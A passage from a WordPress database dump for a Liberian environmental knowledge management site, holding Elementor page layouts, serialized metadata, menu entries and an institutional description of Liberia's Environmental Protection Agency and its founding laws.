documents\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12962,2096,'_elementor_edit_mode','builder'),(12963,2096,'_elementor_template_type','wp-page'),(12964,2096,'_elementor_version','2.7.5'),(12965,2096,'_wp_page_template','default'),(12966,2096,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore to view reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(13004,2107,'_elementor_edit_mode','builder'),(13005,2107,'_elementor_template_type','wp-page'),(13006,2107,'_elementor_version','2.7.5'),(13007,2107,'_wp_page_template','default'),(13008,2107,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore to view reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(13012,2108,'_elementor_edit_mode','builder'),(13013,2108,'_elementor_template_type','wp-page'),(13014,2108,'_elementor_version','2.7.5'),(13015,2108,'_wp_page_template','default'),(13016,2108,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"resource_type\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(13017,2108,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:9:\"jet-posts\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:4;s:8:\"controls\";a:3:{s:7:\"content\";a:3:{s:15:\"section_general\";a:12:{s:6:\"number\";i:1;s:7:\"columns\";i:1;s:17:\"equal_height_cols\";i:1;s:9:\"post_type\";i:1;s:8:\"post_ids\";i:1;s:10:\"show_image\";i:1;s:12:\"show_excerpt\";i:1;s:14:\"excerpt_length\";i:1;s:14:\"show_terms_tax\";i:1;s:9:\"show_meta\";i:1;s:9:\"show_more\";i:1;s:10:\"show_terms\";i:1;}s:27:\"section_posts_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}s:16:\"section_carousel\";a:1:{s:16:\"slides_to_scroll\";i:1;}}s:5:\"style\";a:3:{s:17:\"section_box_style\";a:5:{s:6:\"box_bg\";i:1;s:17:\"box_border_border\";i:1;s:16:\"box_border_width\";i:1;s:16:\"box_border_color\";i:1;s:11:\"box_padding\";i:1;}s:21:\"section_content_style\";a:1:{s:15:\"content_padding\";i:1;}s:19:\"section_title_style\";a:6:{s:11:\"title_color\";i:1;s:17:\"title_color_hover\";i:1;s:27:\"title_typography_typography\";i:1;s:26:\"title_typography_font_size\";i:1;s:13:\"title_padding\";i:1;s:12:\"title_margin\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:2:{s:7:\"_margin\";i:1;s:8:\"_padding\";i:1;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}}'),(13019,89,'ocean_post_layout','left-sidebar'),(13020,2109,'_wp_attached_file','2019/11/epa-logo.png'),(13021,2109,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2019/11/epa-logo.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"epa-logo-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"epa-logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"epa-logo-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13022,2110,'_elementor_edit_mode','builder'),(13023,2110,'_elementor_template_type','wp-post'),(13024,2110,'_elementor_version','2.7.5'),(13025,2110,'_wp_page_template','default'),(13026,2110,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2815956\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(13027,2110,'_thumbnail_id','2035'),(13082,2127,'_menu_item_type','custom'),(13083,2127,'_menu_item_menu_item_parent','0'),(13084,2127,'_menu_item_object_id','2127'),(13085,2127,'_menu_item_object','custom'),(13086,2127,'_menu_item_target','_blank'),(13087,2127,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13088,2127,'_menu_item_xfn',''),(13089,2127,'_menu_item_url','https://www.moa.gov.lr/index.php'),(13091,2127,'_menu_item_template',''),(13092,2127,'_menu_item_mega_template','0'),(13093,2127,'_menu_item_nolink',''),(13094,2127,'_menu_item_category_post',''),(13095,2127,'_menu_item_megamenu',''),(13096,2127,'_menu_item_megamenu_auto_width',''),(13097,2127,'_menu_item_megamenu_col',''),(13098,2127,'_menu_item_megamenu_heading',''),(13099,2127,'_menu_item_megamenu_widgetarea','0'),(13100,2127,'_menu_item_icon',''),(13101,2128,'_menu_item_type','custom'),(13102,2128,'_menu_item_menu_item_parent','0'),(13103,2128,'_menu_item_object_id','2128'),(13104,2128,'_menu_item_object','custom'),(13105,2128,'_menu_item_target','_blank'),(13106,2128,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13107,2128,'_menu_item_xfn',''),(13108,2128,'_menu_item_url','https://www.moa.gov.lr/content.php?content&sub=14&related=7&third=14&pg=sp&pt=Publications'),(13110,2128,'_menu_item_template',''),(13111,2128,'_menu_item_mega_template','0'),(13112,2128,'_menu_item_nolink',''),(13113,2128,'_menu_item_category_post',''),(13114,2128,'_menu_item_megamenu',''),(13115,2128,'_menu_item_megamenu_auto_width',''),(13116,2128,'_menu_item_megamenu_col',''),(13117,2128,'_menu_item_megamenu_heading',''),(13118,2128,'_menu_item_megamenu_widgetarea','0'),(13119,2128,'_menu_item_icon',''),(13120,2127,'_elementor_controls_usage','a:0:{}'),(13121,2128,'_elementor_controls_usage','a:0:{}'),(13122,2129,'_wp_page_template','elementor_canvas'),(13123,2129,'_elementor_edit_mode','builder'),(13124,2129,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.48799999999999954525264911353588104248046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":66.647999999999996134647517465054988861083984375,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Antic Slab\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(97,206,112,0.27)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.8599999999999994315658113919198513031005859375,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\